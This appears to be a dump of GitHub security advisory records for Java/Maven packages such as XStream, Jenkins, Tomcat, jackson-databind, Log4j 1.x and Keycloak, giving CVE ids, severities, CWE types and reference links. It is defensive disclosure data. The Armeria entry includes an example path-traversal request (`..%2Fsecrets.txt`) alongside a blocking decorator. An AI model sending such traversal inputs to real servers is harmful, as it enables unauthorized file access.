* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) | {'CVE-2020-26217'} | 2022-04-25T23:17:04.652412Z | 2020-11-16T20:07:59Z | HIGH | null | {'CWE-78'} | {'https://lists.apache.org/thread.html/r2de526726e7f4db4a7cb91b7355070779f51a84fd985c6529c2f4e9e@%3Cissues.activemq.apache.org%3E', 'https://lists.apache.org/thread.html/r826a006fda71cc96fc87b6eca4b5d195f19a292ad36cea501682c38c@%3Cissues.activemq.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2020/12/msg00001.html', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://github.com/x-stream/xstream/security/advisories/GHSA-mw36-7c6c-q4q2', 'https://nvd.nist.gov/vuln/detail/CVE-2020-26217', 'https://security.netapp.com/advisory/ntap-20210409-0004/', 'https://lists.apache.org/thread.html/redde3609b89b2a4ff18b536a06ef9a77deb93d47fda8ed28086fa8c3@%3Cissues.activemq.apache.org%3E', 'https://github.com/x-stream/xstream', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a', 'https://www.debian.org/security/2020/dsa-4811', 'https://lists.apache.org/thread.html/r7c9fc255edc0b9cd9567093d131f6d33fde4c662aaf912460ef630e9@%3Ccommits.camel.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://x-stream.github.io/CVE-2020-26217.html'} | null |
Maven | GHSA-p92q-7fhh-mq35 | Cross-Site Request Forgery in Jenkins | A cross-site request forgery (CSRF) vulnerability in Jenkins 2.329 and earlier, LTS 2.319.1 and earlier allows attackers to trigger build of job without parameters when no security realm is set. | {'CVE-2022-20612'} | 2022-04-22T15:47:00.669885Z | 2022-01-21T23:37:57Z | MODERATE | null | {'CWE-352'} | {'https://github.com/jenkinsci/jenkins', 'https://www.jenkins.io/changelog-stable/#v2.319.2', 'http://www.openwall.com/lists/oss-security/2022/01/12/6', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://www.jenkins.io/security/advisory/2022-01-12/#SECURITY-2558', 'https://www.jenkins.io/changelog/#v2.330', 'https://nvd.nist.gov/vuln/detail/CVE-2022-20612'} | null |
Maven | GHSA-rpj6-2q8r-98f8 | Incorrect default pattern in Jenkins Audit Trail Plugin | Jenkins Audit Trail Plugin 3.6 and earlier applies pattern matching to a different representation of request URL paths than the Stapler web framework uses for dispatching requests, which allows attackers to craft URLs that bypass request logging of any target URL. | {'CVE-2020-2287'} | 2021-04-22T22:16:34Z | 2022-02-10T20:29:39Z | MODERATE | null | {'CWE-435'} | {'http://www.openwall.com/lists/oss-security/2020/10/08/5', 'https://nvd.nist.gov/vuln/detail/CVE-2020-2287', 'https://www.jenkins.io/security/advisory/2020-10-08/#SECURITY-1815'} | null |
Maven | GHSA-8fp4-rp6c-5gcv | Path Traversal in com.linecorp.armeria:armeria | ### Impact
An attacker can access an Armeria server's local file system beyond its restricted directory by sending an HTTP request whose path contains `%2F` (encoded `/`), such as `/files/..%2Fsecrets.txt`, bypassing Armeria's path validation logic.
### Patches
Armeria 1.13.4 or above contains the hardened path validation logic that handles `%2F` properly.
### Workarounds
This vulnerability can be worked around by inserting a decorator that performs an additional validation on the request path, e.g.
```java
Server
.builder()
.serviceUnder(
"/files",
FileService
.of(...)
.decorate((delegate, ctx, req) -> {
String path = req.headers().path();
if (path.contains("%2f") || path.contains("%2F")) {
return HttpResponse.of(HttpStatus.BAD_REQUEST);
}
return delegate.serve(ctx, req);
})
)
.build()
```
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [line/armeria](https://github.com/line/armeria)
* Chat with us at [Slack](https://armeria.dev/s/slack)
### Credits
This vulnerability was originally reported by Abdallah Zaher ([elcayser-0x0a](https://hackerone.com/elcayser-0x0a?type=user)). | {'CVE-2021-43795'} | 2022-03-03T05:13:34.204718Z | 2021-12-02T22:25:54Z | HIGH | null | {'CWE-22'} | {'https://github.com/line/armeria', 'https://github.com/line/armeria/commit/e2697a575e9df6692b423e02d731f293c1313284', 'https://github.com/line/armeria/pull/3855', 'https://github.com/line/armeria/security/advisories/GHSA-8fp4-rp6c-5gcv', 'https://nvd.nist.gov/vuln/detail/CVE-2021-43795'} | null |
Maven | GHSA-2rvv-w9r2-rg7m | Information Disclosure in Apache Tomcat | When serving resources from a network location using the NTFS file system, Apache Tomcat versions 10.0.0-M1 to 10.0.0-M9, 9.0.0.M1 to 9.0.39, 8.5.0 to 8.5.59 and 7.0.0 to 7.0.106 were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances. | {'CVE-2021-24122'} | 2022-03-03T05:13:27.596547Z | 2021-05-13T22:30:02Z | MODERATE | null | {'CWE-200'} | {'https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52%40%3Cannounce.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/rb32a73b7cb919d4f44a2596b6b951274c0004fc8b0e393d6829a45f9@%3Cusers.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-24122', 'https://security.netapp.com/advisory/ntap-20210212-0008/', 'https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r7e0bb9ea415724550e2b325e143b23e269579e54d66fcd7754bd0c20@%3Cdev.tomcat.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html', 'http://www.openwall.com/lists/oss-security/2021/01/14/1', 'https://lists.apache.org/thread.html/r776c64337495bf28b7d5597268114a888e3fad6045c40a0da0c66d4d@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/rca833c6d42b7b9ce1563488c0929f29fcc95947d86e5e740258c8937@%3Cdev.tomcat.apache.org%3E', 'https://lists.apache.org/thread.html/r7382e1e35b9bc7c8f320b90ad77e74c13172d08034e20c18000fe710@%3Cdev.tomee.apache.org%3E'} | null |
Maven | GHSA-56p8-3fh9-4cvq | XStream is vulnerable to an attack using Regular Expression for a Denial of Service (ReDos) | ### Impact
The vulnerability may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never return. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
### Patches
If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16.
### Workarounds
See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.
### References
See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21348](https://x-stream.github.io/CVE-2021-21348.html).
### Credits
The vulnerability was discovered and reported by threedr3am.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) | {'CVE-2021-21348'} | 2022-03-03T05:14:00.363798Z | 2021-03-22T23:29:09Z | MODERATE | null | {'CWE-502', 'CWE-400'} | {'https://github.com/x-stream/xstream/security/advisories/GHSA-56p8-3fh9-4cvq', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://x-stream.github.io/security.html#workaround', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21348', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/', 'http://x-stream.github.io/changes.html#1.4.16', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html', 'https://www.debian.org/security/2021/dsa-5004', 'https://x-stream.github.io/CVE-2021-21348.html', 'https://security.netapp.com/advisory/ntap-20210430-0002/', 'https://github.com/x-stream/xstream', 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E', 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'} | null |
Maven | GHSA-cvm9-fjm9-3572 | Unsafe Deserialization in jackson-databind | FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS. | {'CVE-2020-36181'} | 2022-04-22T17:30:25.727588Z | 2021-12-09T19:16:10Z | HIGH | null | {'CWE-502'} | {'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://github.com/FasterXML/jackson-databind', 'https://security.netapp.com/advisory/ntap-20210205-0005/', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36181', 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html', 'https://github.com/FasterXML/jackson-databind/issues/3004', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'} | null |
Maven | GHSA-89qr-369f-5m5x | Unsafe Deserialization in jackson-databind | FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS. | {'CVE-2020-36182'} | 2022-04-22T18:30:52.371623Z | 2021-12-09T19:15:46Z | HIGH | null | {'CWE-502'} | {'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://github.com/FasterXML/jackson-databind', 'https://security.netapp.com/advisory/ntap-20210205-0005/', 'https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html', 'https://github.com/FasterXML/jackson-databind/issues/3004', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36182', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'} | null |
Maven | GHSA-w9p3-5cr8-m3jj | Deserialization of Untrusted Data in Log4j 1.x | JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. | {'CVE-2022-23302'} | 2022-04-22T15:47:40.262699Z | 2022-01-21T23:27:14Z | HIGH | null | {'CWE-502'} | {'https://lists.apache.org/thread/bsr3l5qz4g0myrjhy9h67bcxodpkwj4w', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23302', 'https://security.netapp.com/advisory/ntap-20220217-0006/', 'https://logging.apache.org/log4j/1.2/index.html', 'http://www.openwall.com/lists/oss-security/2022/01/18/3', 'https://github.com/apache/logging-log4j1', 'https://www.oracle.com/security-alerts/cpuapr2022.html'} | null |
Maven | GHSA-4fgq-gq9g-3rw7 | Improper Verification of Cryptographic Signature in keycloak | It was found that Keycloak's SAML broker, versions up to 6.0.1, did not verify missing message signatures. If an attacker modifies the SAML Response and removes the <Signature> sections, the message is still accepted, and the message can be modified. An attacker could use this flaw to impersonate other users and gain access to sensitive information. | {'CVE-2019-10201'} | 2022-03-03T05:13:13.980995Z | 2019-09-23T18:32:16Z | MODERATE | null | {'CWE-347'} | {'https://nvd.nist.gov/vuln/detail/CVE-2019-10201', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10201'} | null |
Maven | GHSA-758m-v56v-grj4 | jackson-databind mishandles the interaction between serialization gadgets and typing | FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane. | {'CVE-2020-10969'} | 2022-03-03T05:14:01.552129Z | 2020-04-23T21:36:03Z | HIGH | null | {'CWE-502'} | {'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://github.com/FasterXML/jackson-databind', 'https://security.netapp.com/advisory/ntap-20200403-0002/', 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://github.com/FasterXML/jackson-databind/issues/2642', 'https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-10969', 'https://www.oracle.com/security-alerts/cpuoct2020.html'} | null |
Maven | GHSA-c597-f74m-jgc2 | Improper Certificate Validation and Improper Validation of Certificate with Host Mismatch in Keycloak | A flaw was found in Keycloak in versions before 10.0.0, where it does not perform the TLS hostname verification while sending emails using the SMTP server. This flaw allows an attacker to perform a man-in-the-middle (MITM) attack. | {'CVE-2020-1758'} | 2022-03-03T05:13:28.909615Z | 2022-02-09T00:56:26Z | MODERATE | null | {'CWE-295', 'CWE-297'} | {'https://nvd.nist.gov/vuln/detail/CVE-2020-1758', 'https://issues.redhat.com/browse/KEYCLOAK-13285', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1758'} | null |
Maven | GHSA-5c66-v29h-xjh8 | XSS Cross Site Scripting | ### Impact
It is possible to persistently inject scripts in XWiki.
For unregistred users:
- By filling simple text fields
For registered users:
- By filling their personal information
- (if they have edit rights) By filling the values of static lists using App Within Minutes
That can lead to user's session hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other security vulnerabilities.
That can also lead to the attacker taking over an account.
If the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account.
### Patches
It has been patched on XWiki 12.8 and 12.6.3.
### Workarounds
There is no easy workaround except upgrading XWiki.
### References
https://jira.xwiki.org/browse/XWIKI-17374
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki](https://jira.xwiki.org)
* Email us at our [security mailing list](mailto:security@xwiki.org) | {'CVE-2021-29459'} | 2021-04-20T18:36:33Z | 2021-04-22T16:11:55Z | CRITICAL | null | {'CWE-79'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-29459', 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-5c66-v29h-xjh8'} | null |
Maven | GHSA-4vhj-98r6-424h | In Bouncy Castle JCE Provider it is possible to inject extra elements in the sequence making up the signature and still have it validate | In Bouncy Castle JCE Provider version 1.55 and earlier the DSA does not fully validate ASN.1 encoding of signature on verification. It is possible to inject extra elements in the sequence making up the signature and still have it validate, which in some cases may allow the introduction of 'invisible' data into a signed structure. | {'CVE-2016-1000338'} | 2022-04-27T13:30:13.955304Z | 2018-10-17T16:23:26Z | HIGH | null | {'CWE-347'} | {'https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E', 'https://github.com/advisories/GHSA-4vhj-98r6-424h', 'https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html', 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000338', 'https://github.com/bcgit/bc-java', 'https://access.redhat.com/errata/RHSA-2018:2669', 'https://access.redhat.com/errata/RHSA-2018:2927', 'https://github.com/bcgit/bc-java/commit/b0c3ce99d43d73a096268831d0d120ffc89eac7f#diff-3679f5a9d2b939d0d3ee1601a7774fb0', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://usn.ubuntu.com/3727-1/'} | null |
Maven | GHSA-grpf-gg7v-5g5h | SQL Injection in Apache SkyWalking | Only when using H2/MySQL/TiDB as Apache SkyWalking storage, there is a SQL injection vulnerability in the wildcard query cases. | {'CVE-2020-13921'} | 2022-03-03T05:13:44.746825Z | 2021-05-07T15:53:31Z | CRITICAL | null | {'CWE-89'} | {'https://github.com/apache/skywalking/pull/4970', 'https://nvd.nist.gov/vuln/detail/CVE-2020-13921', 'https://lists.apache.org/thread.html/r6f3a934ebc54585d8468151a494c1919dc1ee2cccaf237ec434dbbd6@%3Cdev.skywalking.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2020/08/05/3', 'https://github.com/apache/skywalking/commit/fb7912c6bdda06a233f4b3e18e71a87d3e4a8951'} | null |
Maven | GHSA-m7jv-hq7h-mq7c | Infinite Loop in Apache Tomcat | The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with invalid payload lengths could lead to a denial of service. | {'CVE-2020-13935'} | 2022-04-22T17:45:17.092400Z | 2022-02-08T22:05:17Z | HIGH | null | {'CWE-835'} | {'https://lists.debian.org/debian-lts-announce/2020/07/msg00017.html', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://usn.ubuntu.com/4448-1/', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://kc.mcafee.com/corporate/index?page=content&id=SB10332', 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00088.html', 'https://security.netapp.com/advisory/ntap-20200724-0003/', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/rd48c72bd3255bda87564d4da3791517c074d94f8a701f93b85752651%40%3Cannounce.tomcat.apache.org%3E', 'http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00084.html', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://usn.ubuntu.com/4596-1/', 'https://www.debian.org/security/2020/dsa-4727', 'https://nvd.nist.gov/vuln/detail/CVE-2020-13935', 'https://lists.apache.org/thread.html/r4e5d3c09f4dd2923191e972408b40fb8b42dbff0bc7904d44b651e50@%3Cusers.tomcat.apache.org%3E'} | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.